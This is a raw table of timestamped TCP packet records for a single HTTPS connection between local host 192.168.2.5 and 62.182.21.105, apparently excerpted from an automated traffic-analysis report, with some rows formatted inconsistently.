Dec 21, 2024 14:59:15.594542027 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.594578028 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.594595909 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.604253054 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.604269981 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.604330063 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.604341030 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.604381084 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.609824896 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.609841108 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.609903097 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.609908104 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.609945059 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.616868973 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.616934061 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.616966963 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.616981983 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.617017031 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.617042065 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.622044086 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.622087955 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.622131109 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.622144938 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.622170925 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.622401953 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.673707008 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.673758984 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.673800945 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.673826933 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.673873901 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.673896074 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.680121899 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.680165052 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.680197954 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.680212975 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.680238962 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.680257082 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.781039953 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.781089067 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.781155109 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.781174898 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.781208992 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.781229019 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.786920071 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.786966085 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.787067890 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.787082911 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.787158966 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.796341896 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.796386957 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.796431065 CET  49710        443        192.168.2.5    62.182.21.105
Dec 21, 2024 14:59:15.796444893 CET  443          49710      62.182.21.105  192.168.2.5
Dec 21, 2024 14:59:15.796482086 CET  49710        443        192.168.2.5    62.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.796502113 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.802237988 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.802282095 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.802318096 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.802331924 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.802361012 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.802380085 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.808294058 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.808336973 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.808393955 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.808408022 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.808434010 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.808461905 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.814639091 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.814682961 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.814727068 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.814739943 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.814770937 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.814807892 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.866554976 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.866615057 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.866638899 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.866676092 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.866695881 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.866714001 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.872020960 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.872081041 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.872122049 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.872165918 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.872189999 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.872241974 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.973058939 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.973114014 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.973145962 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.973181963 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.973206997 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.973226070 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.978368044 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.978419065 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.978450060 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.978465080 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.978493929 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.978519917 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.988662958 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.988707066 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.988754034 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.988769054 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.988797903 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.988852978 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.994647980 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.994698048 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.994749069 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.994764090 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.994792938 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:15.994812965 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.000880003 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.000927925 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.000958920 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.000972986 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.001003027 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.001022100 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.006263018 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.006309032 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.006341934 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.006356955 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.006386995 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.006402969 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.058609962 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.058665037 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.058713913 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.058739901 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.058767080 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.061297894 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.064023972 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.064050913 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.064127922 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.064142942 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.064197063 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.164931059 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.164954901 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.165035009 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.165070057 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.165103912 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.165141106 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.170989037 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.171008110 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.171082020 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.171097040 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.171145916 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.181013107 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.181026936 CET4434971062.182.21.105192.168.2.5
Dec 21, 2024 14:59:16.181102991 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.181118965 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.181169033 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.186477900 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.186491966 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.186568975 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.186583042 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.186723948 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.192718983 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.192734003 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.192811966 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.192825079 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.192879915 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.198749065 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.198762894 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.198832035 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.198843956 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.198892117 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.254698992 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.254713058 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.254813910 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.254829884 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.254884958 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.260101080 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.260114908 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.260194063 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.260205984 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.260257959 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.357083082 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.357098103 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.357183933 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.357206106 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.357259035 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.363123894 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.363137960 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.363209009 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.363220930 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.363275051 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.372977972 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.372996092 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.373085976 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.373099089 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.373147964 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.379623890 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.379643917 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.379699945 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.379717112 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.379743099 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.379765987 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.384871006 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.384886980 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.384957075 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.384972095 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.385011911 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.390733957 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.390748024 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.390832901 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.390846968 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.390897989 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.404349089 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.447066069 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.447093010 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.447205067 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.447233915 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.447289944 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.452554941 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.452580929 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.452640057 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.452656984 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.452687025 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.452708006 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.549796104 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.549820900 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.549889088 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.549910069 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.549937963 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.549957991 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.555250883 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.555269003 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.555356979 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.555372000 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.555423975 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.565001965 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.565028906 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.565099955 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.565118074 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.565141916 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.565201998 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.571331024 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.571346998 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.571407080 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.571422100 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.571470022 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.577471972 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.577488899 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.577544928 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.577558041 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.577734947 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.582844973 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.582860947 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.582928896 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.582941055 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.582988977 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.638858080 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.638875961 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.638941050 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.638957977 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.639009953 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.644912004 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.644926071 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.644987106 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.645000935 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.645061016 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.742378950 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.742403984 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.742482901 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.742512941 CET    443      49710    62.182.21.105    192.168.2.5
Dec 21, 2024 14:59:16.742573023 CET    49710    443      192.168.2.5      62.182.21.105
Dec 21, 2024 14:59:16.748184919 CET    443      49710    62.182.21.105    192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.748208046 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.748289108 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.748305082 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.748358965 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.759134054 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.759155989 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.759248018 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.759279013 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.759342909 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.763709068 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.763731003 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.763818026 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.763829947 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.763876915 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.769848108 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.769870996 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.769920111 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.769932985 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.769974947 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.769996881 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.775188923 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.775208950 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.775304079 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.775336027 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.775422096 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.831173897 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.831201077 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.831305981 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.831336975 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.831386089 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.837357998 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.837388992 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.837434053 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.837446928 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.837476969 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.837495089 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.934356928 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.934382915 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.934458971 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.934484959 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.934551001 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.944632053 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.944653988 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.944742918 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.944761038 CET4434971062.182.21.105192.168.2.5
